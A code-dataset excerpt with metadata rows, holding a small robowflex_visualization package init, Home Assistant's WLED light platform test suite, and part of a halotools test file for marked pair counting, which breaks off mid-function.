] | 14 | 2021-04-05T23:49:55.000Z | 2022-03-21T00:18:16.000Z | __all__ = ["robot", "scene", "primitives", "utils"]
import robowflex_visualization.robot as robot
import robowflex_visualization.scene as scene
import robowflex_visualization.primitives as primitives
import robowflex_visualization.utils as utils
| 35.285714 | 55 | 0.834008 | 29 | 247 | 6.827586 | 0.310345 | 0.30303 | 0.565657 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093117 | 247 | 6 | 56 | 41.166667 | 0.883929 | 0 | 0 | 0 | 0 | 0 | 0.101215 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.8 | 0 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c37f28a882ecf99eb9a0a6d8071c997355a1a4dc | 17,875 | py | Python | tests/components/wled/test_light.py | RyuzakiKK/core | 3276666457c985738ffb255fd1e959c4d58433db | [
"Apache-2.0"
] | null | null | null | tests/components/wled/test_light.py | RyuzakiKK/core | 3276666457c985738ffb255fd1e959c4d58433db | [
"Apache-2.0"
] | null | null | null | tests/components/wled/test_light.py | RyuzakiKK/core | 3276666457c985738ffb255fd1e959c4d58433db | [
"Apache-2.0"
] | null | null | null | """Tests for the WLED light platform."""
import json
from unittest.mock import MagicMock
import pytest
from wled import Device as WLEDDevice, WLEDConnectionError, WLEDError
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_EFFECT,
ATTR_HS_COLOR,
ATTR_RGB_COLOR,
ATTR_RGBW_COLOR,
ATTR_TRANSITION,
DOMAIN as LIGHT_DOMAIN,
)
from homeassistant.components.wled.const import (
ATTR_INTENSITY,
ATTR_PALETTE,
ATTR_PLAYLIST,
ATTR_PRESET,
ATTR_REVERSE,
ATTR_SPEED,
DOMAIN,
SCAN_INTERVAL,
SERVICE_EFFECT,
SERVICE_PRESET,
)
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_ICON,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_OFF,
STATE_ON,
STATE_UNAVAILABLE,
)
from homeassistant.core import HomeAssistant
from homeassistant.helpers import entity_registry as er
import homeassistant.util.dt as dt_util
from tests.common import MockConfigEntry, async_fire_time_changed, load_fixture
async def test_rgb_light_state(
hass: HomeAssistant, init_integration: MockConfigEntry
) -> None:
"""Test the creation and values of the WLED lights."""
entity_registry = er.async_get(hass)
# First segment of the strip
state = hass.states.get("light.wled_rgb_light_segment_0")
assert state
assert state.attributes.get(ATTR_BRIGHTNESS) == 127
assert state.attributes.get(ATTR_EFFECT) == "Solid"
assert state.attributes.get(ATTR_HS_COLOR) == (37.412, 100.0)
assert state.attributes.get(ATTR_ICON) == "mdi:led-strip-variant"
assert state.attributes.get(ATTR_INTENSITY) == 128
assert state.attributes.get(ATTR_PALETTE) == "Default"
assert state.attributes.get(ATTR_PLAYLIST) is None
assert state.attributes.get(ATTR_PRESET) is None
assert state.attributes.get(ATTR_REVERSE) is False
assert state.attributes.get(ATTR_SPEED) == 32
assert state.state == STATE_ON
entry = entity_registry.async_get("light.wled_rgb_light_segment_0")
assert entry
assert entry.unique_id == "aabbccddeeff_0"
# Second segment of the strip
state = hass.states.get("light.wled_rgb_light_segment_1")
assert state
assert state.attributes.get(ATTR_BRIGHTNESS) == 127
assert state.attributes.get(ATTR_EFFECT) == "Blink"
assert state.attributes.get(ATTR_HS_COLOR) == (148.941, 100.0)
assert state.attributes.get(ATTR_ICON) == "mdi:led-strip-variant"
assert state.attributes.get(ATTR_INTENSITY) == 64
assert state.attributes.get(ATTR_PALETTE) == "Random Cycle"
assert state.attributes.get(ATTR_PLAYLIST) is None
assert state.attributes.get(ATTR_PRESET) is None
assert state.attributes.get(ATTR_REVERSE) is False
assert state.attributes.get(ATTR_SPEED) == 16
assert state.state == STATE_ON
entry = entity_registry.async_get("light.wled_rgb_light_segment_1")
assert entry
assert entry.unique_id == "aabbccddeeff_1"
# Test master control of the lightstrip
state = hass.states.get("light.wled_rgb_light_master")
assert state
assert state.attributes.get(ATTR_BRIGHTNESS) == 127
assert state.state == STATE_ON
entry = entity_registry.async_get("light.wled_rgb_light_master")
assert entry
assert entry.unique_id == "aabbccddeeff"
async def test_segment_change_state(
hass: HomeAssistant,
init_integration: MockConfigEntry,
mock_wled: MagicMock,
) -> None:
"""Test the change of state of the WLED segments."""
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: "light.wled_rgb_light_segment_0", ATTR_TRANSITION: 5},
blocking=True,
)
await hass.async_block_till_done()
assert mock_wled.segment.call_count == 1
mock_wled.segment.assert_called_with(
on=False,
segment_id=0,
transition=50,
)
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_ON,
{
ATTR_BRIGHTNESS: 42,
ATTR_EFFECT: "Chase",
ATTR_ENTITY_ID: "light.wled_rgb_light_segment_0",
ATTR_RGB_COLOR: [255, 0, 0],
ATTR_TRANSITION: 5,
},
blocking=True,
)
await hass.async_block_till_done()
assert mock_wled.segment.call_count == 2
mock_wled.segment.assert_called_with(
brightness=42,
color_primary=(255, 0, 0),
effect="Chase",
on=True,
segment_id=0,
transition=50,
)
async def test_master_change_state(
hass: HomeAssistant,
init_integration: MockConfigEntry,
mock_wled: MagicMock,
) -> None:
"""Test the change of state of the WLED master light control."""
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: "light.wled_rgb_light_master", ATTR_TRANSITION: 5},
blocking=True,
)
await hass.async_block_till_done()
assert mock_wled.master.call_count == 1
mock_wled.master.assert_called_with(
on=False,
transition=50,
)
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_ON,
{
ATTR_BRIGHTNESS: 42,
ATTR_ENTITY_ID: "light.wled_rgb_light_master",
ATTR_TRANSITION: 5,
},
blocking=True,
)
await hass.async_block_till_done()
assert mock_wled.master.call_count == 2
mock_wled.master.assert_called_with(
brightness=42,
on=True,
transition=50,
)
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: "light.wled_rgb_light_master", ATTR_TRANSITION: 5},
blocking=True,
)
await hass.async_block_till_done()
assert mock_wled.master.call_count == 3
mock_wled.master.assert_called_with(
on=False,
transition=50,
)
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_ON,
{
ATTR_BRIGHTNESS: 42,
ATTR_ENTITY_ID: "light.wled_rgb_light_master",
ATTR_TRANSITION: 5,
},
blocking=True,
)
await hass.async_block_till_done()
assert mock_wled.master.call_count == 4
mock_wled.master.assert_called_with(
brightness=42,
on=True,
transition=50,
)
async def test_dynamically_handle_segments(
hass: HomeAssistant,
init_integration: MockConfigEntry,
mock_wled: MagicMock,
) -> None:
"""Test if a new/deleted segment is dynamically added/removed."""
assert hass.states.get("light.wled_rgb_light_master")
assert hass.states.get("light.wled_rgb_light_segment_0")
assert hass.states.get("light.wled_rgb_light_segment_1")
return_value = mock_wled.update.return_value
mock_wled.update.return_value = WLEDDevice(
json.loads(load_fixture("wled/rgb_single_segment.json"))
)
async_fire_time_changed(hass, dt_util.utcnow() + SCAN_INTERVAL)
await hass.async_block_till_done()
assert hass.states.get("light.wled_rgb_light_segment_0")
assert not hass.states.get("light.wled_rgb_light_segment_1")
assert not hass.states.get("light.wled_rgb_light_master")
# Test adding if segment shows up again, including the master entity
mock_wled.update.return_value = return_value
async_fire_time_changed(hass, dt_util.utcnow() + SCAN_INTERVAL)
await hass.async_block_till_done()
assert hass.states.get("light.wled_rgb_light_master")
assert hass.states.get("light.wled_rgb_light_segment_0")
assert hass.states.get("light.wled_rgb_light_segment_1")
@pytest.mark.parametrize("mock_wled", ["wled/rgb_single_segment.json"], indirect=True)
async def test_single_segment_behavior(
hass: HomeAssistant,
init_integration: MockConfigEntry,
mock_wled: MagicMock,
) -> None:
"""Test the behavior of the integration with a single segment."""
device = mock_wled.update.return_value
assert not hass.states.get("light.wled_rgb_light_master")
state = hass.states.get("light.wled_rgb_light")
assert state
assert state.state == STATE_ON
# Test segment brightness takes master into account
device.state.brightness = 100
device.state.segments[0].brightness = 255
async_fire_time_changed(hass, dt_util.utcnow() + SCAN_INTERVAL)
await hass.async_block_till_done()
state = hass.states.get("light.wled_rgb_light")
assert state
assert state.attributes.get(ATTR_BRIGHTNESS) == 100
# Test segment is off when master is off
device.state.on = False
async_fire_time_changed(hass, dt_util.utcnow() + SCAN_INTERVAL)
await hass.async_block_till_done()
state = hass.states.get("light.wled_rgb_light")
assert state
assert state.state == STATE_OFF
# Test master is turned off when turning off a single segment
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: "light.wled_rgb_light", ATTR_TRANSITION: 5},
blocking=True,
)
await hass.async_block_till_done()
assert mock_wled.master.call_count == 1
mock_wled.master.assert_called_with(
on=False,
transition=50,
)
# Test master is turned on when turning on a single segment, and segment
# brightness is set to 255.
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_ON,
{
ATTR_ENTITY_ID: "light.wled_rgb_light",
ATTR_TRANSITION: 5,
ATTR_BRIGHTNESS: 42,
},
blocking=True,
)
await hass.async_block_till_done()
assert mock_wled.segment.call_count == 1
assert mock_wled.master.call_count == 2
mock_wled.segment.assert_called_with(on=True, segment_id=0, brightness=255)
mock_wled.master.assert_called_with(on=True, transition=50, brightness=42)
async def test_light_error(
hass: HomeAssistant,
init_integration: MockConfigEntry,
mock_wled: MagicMock,
caplog: pytest.LogCaptureFixture,
) -> None:
"""Test error handling of the WLED lights."""
mock_wled.segment.side_effect = WLEDError
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: "light.wled_rgb_light_segment_0"},
blocking=True,
)
await hass.async_block_till_done()
state = hass.states.get("light.wled_rgb_light_segment_0")
assert state
assert state.state == STATE_ON
assert "Invalid response from API" in caplog.text
assert mock_wled.segment.call_count == 1
mock_wled.segment.assert_called_with(on=False, segment_id=0)
async def test_light_connection_error(
hass: HomeAssistant,
init_integration: MockConfigEntry,
mock_wled: MagicMock,
caplog: pytest.LogCaptureFixture,
) -> None:
"""Test error handling of the WLED switches."""
mock_wled.segment.side_effect = WLEDConnectionError
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: "light.wled_rgb_light_segment_0"},
blocking=True,
)
await hass.async_block_till_done()
state = hass.states.get("light.wled_rgb_light_segment_0")
assert state
assert state.state == STATE_UNAVAILABLE
assert "Error communicating with API" in caplog.text
assert mock_wled.segment.call_count == 1
mock_wled.segment.assert_called_with(on=False, segment_id=0)
@pytest.mark.parametrize("mock_wled", ["wled/rgbw.json"], indirect=True)
async def test_rgbw_light(
hass: HomeAssistant, init_integration: MockConfigEntry, mock_wled: MagicMock
) -> None:
"""Test RGBW support for WLED."""
state = hass.states.get("light.wled_rgbw_light")
assert state
assert state.state == STATE_ON
assert state.attributes.get(ATTR_RGBW_COLOR) == (255, 0, 0, 139)
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_ON,
{
ATTR_ENTITY_ID: "light.wled_rgbw_light",
ATTR_RGBW_COLOR: (255, 255, 255, 255),
},
blocking=True,
)
await hass.async_block_till_done()
assert mock_wled.segment.call_count == 1
mock_wled.segment.assert_called_with(
color_primary=(255, 255, 255, 255),
on=True,
segment_id=0,
)
async def test_effect_service(
hass: HomeAssistant, init_integration: MockConfigEntry, mock_wled: MagicMock
) -> None:
"""Test the effect service of a WLED light."""
await hass.services.async_call(
DOMAIN,
SERVICE_EFFECT,
{
ATTR_EFFECT: "Rainbow",
ATTR_ENTITY_ID: "light.wled_rgb_light_segment_0",
ATTR_INTENSITY: 200,
ATTR_PALETTE: "Tiamat",
ATTR_REVERSE: True,
ATTR_SPEED: 100,
},
blocking=True,
)
await hass.async_block_till_done()
assert mock_wled.segment.call_count == 1
mock_wled.segment.assert_called_with(
effect="Rainbow",
intensity=200,
palette="Tiamat",
reverse=True,
segment_id=0,
speed=100,
)
await hass.services.async_call(
DOMAIN,
SERVICE_EFFECT,
{ATTR_ENTITY_ID: "light.wled_rgb_light_segment_0", ATTR_EFFECT: 9},
blocking=True,
)
await hass.async_block_till_done()
assert mock_wled.segment.call_count == 2
mock_wled.segment.assert_called_with(
segment_id=0,
effect=9,
)
await hass.services.async_call(
DOMAIN,
SERVICE_EFFECT,
{
ATTR_ENTITY_ID: "light.wled_rgb_light_segment_0",
ATTR_INTENSITY: 200,
ATTR_REVERSE: True,
ATTR_SPEED: 100,
},
blocking=True,
)
await hass.async_block_till_done()
assert mock_wled.segment.call_count == 3
mock_wled.segment.assert_called_with(
intensity=200,
reverse=True,
segment_id=0,
speed=100,
)
await hass.services.async_call(
DOMAIN,
SERVICE_EFFECT,
{
ATTR_EFFECT: "Rainbow",
ATTR_ENTITY_ID: "light.wled_rgb_light_segment_0",
ATTR_PALETTE: "Tiamat",
ATTR_REVERSE: True,
ATTR_SPEED: 100,
},
blocking=True,
)
await hass.async_block_till_done()
assert mock_wled.segment.call_count == 4
mock_wled.segment.assert_called_with(
effect="Rainbow",
palette="Tiamat",
reverse=True,
segment_id=0,
speed=100,
)
await hass.services.async_call(
DOMAIN,
SERVICE_EFFECT,
{
ATTR_EFFECT: "Rainbow",
ATTR_ENTITY_ID: "light.wled_rgb_light_segment_0",
ATTR_INTENSITY: 200,
ATTR_SPEED: 100,
},
blocking=True,
)
await hass.async_block_till_done()
assert mock_wled.segment.call_count == 5
mock_wled.segment.assert_called_with(
effect="Rainbow",
intensity=200,
segment_id=0,
speed=100,
)
await hass.services.async_call(
DOMAIN,
SERVICE_EFFECT,
{
ATTR_EFFECT: "Rainbow",
ATTR_ENTITY_ID: "light.wled_rgb_light_segment_0",
ATTR_INTENSITY: 200,
ATTR_REVERSE: True,
},
blocking=True,
)
await hass.async_block_till_done()
assert mock_wled.segment.call_count == 6
mock_wled.segment.assert_called_with(
effect="Rainbow",
intensity=200,
reverse=True,
segment_id=0,
)
async def test_effect_service_error(
hass: HomeAssistant,
init_integration: MockConfigEntry,
mock_wled: MagicMock,
caplog: pytest.LogCaptureFixture,
) -> None:
"""Test error handling of the WLED effect service."""
mock_wled.segment.side_effect = WLEDError
await hass.services.async_call(
DOMAIN,
SERVICE_EFFECT,
{ATTR_ENTITY_ID: "light.wled_rgb_light_segment_0", ATTR_EFFECT: 9},
blocking=True,
)
await hass.async_block_till_done()
state = hass.states.get("light.wled_rgb_light_segment_0")
assert state
assert state.state == STATE_ON
assert "Invalid response from API" in caplog.text
assert mock_wled.segment.call_count == 1
mock_wled.segment.assert_called_with(effect=9, segment_id=0)
async def test_preset_service(
hass: HomeAssistant, init_integration: MockConfigEntry, mock_wled: MagicMock
) -> None:
"""Test the preset service of a WLED light."""
await hass.services.async_call(
DOMAIN,
SERVICE_PRESET,
{
ATTR_ENTITY_ID: "light.wled_rgb_light_segment_0",
ATTR_PRESET: 1,
},
blocking=True,
)
await hass.async_block_till_done()
assert mock_wled.preset.call_count == 1
mock_wled.preset.assert_called_with(preset=1)
await hass.services.async_call(
DOMAIN,
SERVICE_PRESET,
{
ATTR_ENTITY_ID: "light.wled_rgb_light_master",
ATTR_PRESET: 2,
},
blocking=True,
)
await hass.async_block_till_done()
assert mock_wled.preset.call_count == 2
mock_wled.preset.assert_called_with(preset=2)
async def test_preset_service_error(
hass: HomeAssistant,
init_integration: MockConfigEntry,
mock_wled: MagicMock,
caplog: pytest.LogCaptureFixture,
) -> None:
"""Test error handling of the WLED preset service."""
mock_wled.preset.side_effect = WLEDError
await hass.services.async_call(
DOMAIN,
SERVICE_PRESET,
{ATTR_ENTITY_ID: "light.wled_rgb_light_segment_0", ATTR_PRESET: 1},
blocking=True,
)
await hass.async_block_till_done()
state = hass.states.get("light.wled_rgb_light_segment_0")
assert state
assert state.state == STATE_ON
assert "Invalid response from API" in caplog.text
assert mock_wled.preset.call_count == 1
mock_wled.preset.assert_called_with(preset=1)
| 30.245347 | 86 | 0.675524 | 2,281 | 17,875 | 4.993424 | 0.07979 | 0.045654 | 0.045303 | 0.064179 | 0.836084 | 0.814135 | 0.784636 | 0.754785 | 0.742757 | 0.727392 | 0 | 0.018773 | 0.234126 | 17,875 | 590 | 87 | 30.29661 | 0.813221 | 0.024671 | 0 | 0.665347 | 0 | 0 | 0.097696 | 0.074239 | 0 | 0 | 0 | 0 | 0.213861 | 1 | 0 | false | 0 | 0.021782 | 0 | 0.021782 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5eebed31ed5f718febee91f091aead6fbdb806e8 | 16,432 | py | Python | halotools/mock_observables/pair_counters/test_pair_counters/test_marked_npairs_xy_z.py | nehapjoshi/halotools | ad9e183ee7471f7876201ce83fdc36a76e653902 | [
"BSD-3-Clause"
] | null | null | null | halotools/mock_observables/pair_counters/test_pair_counters/test_marked_npairs_xy_z.py | nehapjoshi/halotools | ad9e183ee7471f7876201ce83fdc36a76e653902 | [
"BSD-3-Clause"
] | null | null | null | halotools/mock_observables/pair_counters/test_pair_counters/test_marked_npairs_xy_z.py | nehapjoshi/halotools | ad9e183ee7471f7876201ce83fdc36a76e653902 | [
"BSD-3-Clause"
] | null | null | null | """
"""
from __future__ import (absolute_import, division, print_function, unicode_literals)
import numpy as np
import pytest
from astropy.utils.misc import NumpyRNGContext
from astropy.config.paths import _find_home
from ..pairs import xy_z_wnpairs as pure_python_weighted_pairs
from ..marked_npairs_xy_z import marked_npairs_xy_z
from ..npairs_xy_z import npairs_xy_z
from ..marked_npairs_xy_z import _func_signature_int_from_wfunc
from ....custom_exceptions import HalotoolsError
slow = pytest.mark.slow
error_msg = ("\nThe `test_marked_npairs_wfuncs_behavior` function performs \n"
"non-trivial checks on the returned values of marked correlation functions\n"
"calculated on a set of points with uniform weights.\n"
"One such check failed.\n")
__all__ = ('test_marked_npairs_xy_z_periodic', )
fixed_seed = 43
# Determine whether the machine is mine
# This will be used to select tests whose
# returned values depend on the configuration
# of my personal cache directory files
aph_home = '/Users/aphearin'
detected_home = _find_home()
if aph_home == detected_home:
APH_MACHINE = True
else:
APH_MACHINE = False
def retrieve_mock_data(Npts, Npts2, Lbox):
# set up a regular grid of points to test pair counters
epsilon = 0.001
gridx = np.linspace(0, Lbox-epsilon, Npts2)
gridy = np.linspace(0, Lbox-epsilon, Npts2)
gridz = np.linspace(0, Lbox-epsilon, Npts2)
xx, yy, zz = np.array(np.meshgrid(gridx, gridy, gridz))
xx = xx.flatten()
yy = yy.flatten()
zz = zz.flatten()
grid_points = np.vstack([xx, yy, zz]).T
rp_bins = np.array([0.0, 0.1, 0.2, 0.3])
period = np.array([Lbox, Lbox, Lbox])
return grid_points, rp_bins, period
def test_marked_npairs_xy_z_periodic():
"""
Function tests marked_npairs with periodic boundary conditions.
"""
Npts = 1000
with NumpyRNGContext(fixed_seed):
random_sample = np.random.random((Npts, 3))
ran_weights1 = np.random.random((Npts, 1))
period = np.array([1.0, 1.0, 1.0])
rp_bins = np.array([0.0, 0.1, 0.2, 0.3])
pi_bins = np.array([0, 0.15])
result = marked_npairs_xy_z(random_sample, random_sample,
rp_bins, pi_bins, period=period,
weights1=ran_weights1, weights2=ran_weights1, weight_func_id=1)
test_result = pure_python_weighted_pairs(random_sample, random_sample, rp_bins, pi_bins,
period=period, weights1=ran_weights1, weights2=ran_weights1)
assert np.allclose(test_result, result, rtol=1e-05), "pair counts are incorrect"
def test_marked_npairs_xy_z_nonperiodic():
"""
Function tests marked_npairs without periodic boundary conditions.
"""
Npts = 1000
with NumpyRNGContext(fixed_seed):
random_sample = np.random.random((Npts, 3))
ran_weights1 = np.random.random((Npts, 1))
rp_bins = np.array([0.0, 0.1, 0.2, 0.3])
pi_bins = np.array([0, 0.15])
result = marked_npairs_xy_z(random_sample, random_sample,
rp_bins, pi_bins, period=None,
weights1=ran_weights1, weights2=ran_weights1, weight_func_id=1)
test_result = pure_python_weighted_pairs(random_sample, random_sample,
rp_bins, pi_bins, period=None, weights1=ran_weights1, weights2=ran_weights1)
assert np.allclose(test_result, result, rtol=1e-05), "pair counts are incorrect"
@pytest.mark.skipif('not APH_MACHINE')
def test_marked_npairs_parallelization():
"""
Function tests marked_npairs_3d with periodic boundary conditions.
"""
Npts = 1000
with NumpyRNGContext(fixed_seed):
random_sample = np.random.random((Npts, 3))
ran_weights1 = np.random.random((Npts, 1))
period = np.array([1.0, 1.0, 1.0])
rp_bins = np.array([0.0, 0.1, 0.2, 0.3])
pi_bins = np.array([0, 0.15])
serial_result = marked_npairs_xy_z(random_sample, random_sample,
rp_bins, pi_bins, period=period, weights1=ran_weights1, weights2=ran_weights1,
weight_func_id=1)
parallel_result2 = marked_npairs_xy_z(random_sample, random_sample,
rp_bins, pi_bins, period=period, weights1=ran_weights1, weights2=ran_weights1,
weight_func_id=1, num_threads=2)
parallel_result7 = marked_npairs_xy_z(random_sample, random_sample,
rp_bins, pi_bins, period=period, weights1=ran_weights1, weights2=ran_weights1,
weight_func_id=1, num_threads=3)
assert np.allclose(serial_result, parallel_result2, rtol=1e-05), "pair counts are incorrect"
assert np.allclose(serial_result, parallel_result7, rtol=1e-05), "pair counts are incorrect"
@slow
def test_marked_npairs_3d_wfuncs_signatures():
"""
Loop over all wfuncs and ensure that the wfunc signature is handled correctly.
"""
Npts = 1000
with NumpyRNGContext(fixed_seed):
random_sample = np.random.random((Npts, 3))
rp_bins = np.array([0.0, 0.1, 0.2, 0.3])
pi_bins = np.array([0, 0.15])
rmax = rp_bins.max()
period = np.array([1.0, 1.0, 1.0])
# Determine how many wfuncs have currently been implemented
wfunc_index = 1
while True:
try:
_ = _func_signature_int_from_wfunc(wfunc_index)
wfunc_index += 1
except HalotoolsError:
break
num_wfuncs = np.copy(wfunc_index)
# Now loop over all all available weight_func_id indices
for wfunc_index in range(1, num_wfuncs):
signature = _func_signature_int_from_wfunc(wfunc_index)
with NumpyRNGContext(fixed_seed):
weights = np.random.random(Npts*signature).reshape(Npts, signature) - 0.5
result = marked_npairs_xy_z(random_sample, random_sample, rp_bins, pi_bins,
period=period, weights1=weights, weights2=weights, weight_func_id=wfunc_index,
approx_cell1_size=[rmax, rmax, rmax])
with pytest.raises(HalotoolsError):
signature = _func_signature_int_from_wfunc(wfunc_index) + 1
with NumpyRNGContext(fixed_seed):
weights = np.random.random(Npts*signature).reshape(Npts, signature) - 0.5
result = marked_npairs_xy_z(random_sample, random_sample, rp_bins, pi_bins,
period=period, weights1=weights, weights2=weights, weight_func_id=wfunc_index)
@slow
def test_marked_npairs_behavior_weight_func_id1():
"""
Verify the behavior of a few wfunc-weighted counters by comparing pure python,
unmarked pairs to the returned result from a uniformly weighted set of points.
"""
Npts, Npts2 = 1000, 10
grid_points, rp_bins, period = retrieve_mock_data(Npts, Npts2, 1)
rmax = rp_bins.max()
pi_bins = np.array([0, 0.15])
# wfunc = 1
weights = np.ones(Npts)*3
result = marked_npairs_xy_z(grid_points, grid_points, rp_bins, pi_bins, period=period,
weights1=weights, weights2=weights, weight_func_id=1, approx_cell1_size=[rmax, rmax, rmax])
test_result = pure_python_weighted_pairs(grid_points, grid_points,
rp_bins, pi_bins, period=period,
weights1=np.ones((Npts, 1)), weights2=np.ones((Npts, 1)))
assert np.all(result == 9.*test_result)
@slow
def test_marked_npairs_behavior_weight_func_id2():
"""
Verify the behavior of a few wfunc-weighted counters by comparing pure python,
unmarked pairs to the returned result from a uniformly weighted set of points.
"""
Npts, Npts2 = 1000, 10
grid_points, rp_bins, period = retrieve_mock_data(Npts, Npts2, 1)
rmax = rp_bins.max()
pi_bins = np.array([0, 0.15])
test_result = pure_python_weighted_pairs(grid_points, grid_points,
rp_bins, pi_bins, weights1=np.ones((Npts, 1)), weights2=np.ones((Npts, 1)), period=period)
# wfunc = 2
weights = np.ones(Npts)*3
result = marked_npairs_xy_z(grid_points, grid_points, rp_bins, pi_bins, period=period,
weights1=weights, weights2=weights, weight_func_id=2, approx_cell1_size=[rmax, rmax, rmax])
assert np.all(result == 6.*test_result), error_msg
@slow
def test_marked_npairs_behavior_weight_func_id3():
"""
Verify the behavior of a few wfunc-weighted counters by comparing pure python,
unmarked pairs to the returned result from a uniformly weighted set of points.
"""
Npts, Npts2 = 1000, 10
grid_points, rp_bins, period = retrieve_mock_data(Npts, Npts2, 1)
rmax = rp_bins.max()
pi_bins = np.array([0, 0.15])
test_result = pure_python_weighted_pairs(grid_points, grid_points,
rp_bins, pi_bins, weights1=np.ones((Npts, 1)), weights2=np.ones((Npts, 1)), period=period)
# wfunc = 3
weights2 = np.ones(Npts)*2
weights3 = np.ones(Npts)*3
weights = np.vstack([weights2, weights3]).T
result = marked_npairs_xy_z(grid_points, grid_points, rp_bins, pi_bins, period=period,
weights1=weights, weights2=weights, weight_func_id=3, approx_cell1_size=[rmax, rmax, rmax])
assert np.all(result == 9.*test_result), error_msg
weights = np.vstack([weights3, weights2]).T
result = marked_npairs_xy_z(grid_points, grid_points, rp_bins, pi_bins, period=period,
weights1=weights, weights2=weights, weight_func_id=3, approx_cell1_size=[rmax, rmax, rmax])
assert np.all(result == 4.*test_result), error_msg
@slow
def test_marked_npairs_behavior_weight_func_id4():
"""
Verify the behavior of a few wfunc-weighted counters by comparing pure python,
unmarked pairs to the returned result from a uniformly weighted set of points.
"""
Npts, Npts2 = 1000, 10
grid_points, rp_bins, period = retrieve_mock_data(Npts, Npts2, 1)
rmax = rp_bins.max()
pi_bins = np.array([0, 0.15])
# wfunc = 4
weights2 = np.ones(Npts)*2
weights3 = np.ones(Npts)*3
weights = np.vstack([weights2, weights3]).T
result = marked_npairs_xy_z(grid_points, grid_points, rp_bins, pi_bins, period=period,
weights1=weights, weights2=weights, weight_func_id=4, approx_cell1_size=[rmax, rmax, rmax])
assert np.all(result == 0), error_msg
@slow
def test_marked_npairs_behavior_weight_func_id5():
"""
Verify the behavior of a few wfunc-weighted counters by comparing pure python,
unmarked pairs to the returned result from a uniformly weighted set of points.
"""
Npts, Npts2 = 1000, 10
grid_points, rp_bins, period = retrieve_mock_data(Npts, Npts2, 1)
rmax = rp_bins.max()
pi_bins = np.array([0, 0.15])
# wfunc = 5
weights2 = np.ones(Npts)*2
weights3 = np.ones(Npts)*3
weights = np.vstack([weights2, weights3]).T
result = marked_npairs_xy_z(grid_points, grid_points, rp_bins, pi_bins, period=period,
weights1=weights, weights2=weights, weight_func_id=5, approx_cell1_size=[rmax, rmax, rmax])
assert np.all(result == 0), error_msg
@slow
def test_marked_npairs_behavior_weight_func_id6():
"""
Verify the behavior of a few wfunc-weighted counters by comparing pure python,
unmarked pairs to the returned result from a uniformly weighted set of points.
"""
Npts, Npts2 = 1000, 10
grid_points, rp_bins, period = retrieve_mock_data(Npts, Npts2, 1)
rmax = rp_bins.max()
pi_bins = np.array([0, 0.15])
# wfunc = 6
weights2 = np.ones(Npts)*2
weights3 = np.ones(Npts)*3
weights = np.vstack([weights2, weights3]).T
result = marked_npairs_xy_z(grid_points, grid_points, rp_bins, pi_bins, period=period,
weights1=weights, weights2=weights, weight_func_id=6, approx_cell1_size=[rmax, rmax, rmax])
assert np.all(result == 0), error_msg
@slow
def test_marked_npairs_behavior_weight_func_id7():
"""
Verify the behavior of a few wfunc-weighted counters by comparing pure python,
unmarked pairs to the returned result from a uniformly weighted set of points.
"""
Npts, Npts2 = 1000, 10
grid_points, rp_bins, period = retrieve_mock_data(Npts, Npts2, 1)
rmax = rp_bins.max()
pi_bins = np.array([0, 0.15])
test_result = pure_python_weighted_pairs(grid_points, grid_points,
rp_bins, pi_bins, weights1=np.ones((Npts, 1)), weights2=np.ones((Npts, 1)), period=period)
# wfunc = 7
weights2 = np.ones(Npts)
weights3 = np.zeros(Npts)-1
weights = np.vstack([weights2, weights3]).T
result = marked_npairs_xy_z(grid_points, grid_points, rp_bins, pi_bins, period=period,
weights1=weights, weights2=weights, weight_func_id=7, approx_cell1_size=[rmax, rmax, rmax])
assert np.all(result == -test_result), error_msg
@slow
def test_marked_npairs_behavior_weight_func_id8():
"""
Verify the behavior of a few wfunc-weighted counters by comparing pure python,
unmarked pairs to the returned result from a uniformly weighted set of points.
"""
Npts, Npts2 = 1000, 10
grid_points, rp_bins, period = retrieve_mock_data(Npts, Npts2, 1)
rmax = rp_bins.max()
pi_bins = np.array([0, 0.15])
test_result = pure_python_weighted_pairs(grid_points, grid_points,
rp_bins, pi_bins, weights1=np.ones((Npts, 1)), weights2=np.ones((Npts, 1)), period=period)
# wfunc = 8
weights2 = np.ones(Npts)
weights3 = np.ones(Npts)*3
weights = np.vstack([weights2, weights3]).T
result = marked_npairs_xy_z(grid_points, grid_points, rp_bins, pi_bins, period=period,
weights1=weights, weights2=weights, weight_func_id=8, approx_cell1_size=[rmax, rmax, rmax])
assert np.all(result == 3*test_result), error_msg
@slow
def test_marked_npairs_behavior_weight_func_id9():
"""
Verify the behavior of a few wfunc-weighted counters by comparing pure python,
unmarked pairs to the returned result from a uniformly weighted set of points.
"""
Npts, Npts2 = 1000, 10
grid_points, rp_bins, period = retrieve_mock_data(Npts, Npts2, 1)
rmax = rp_bins.max()
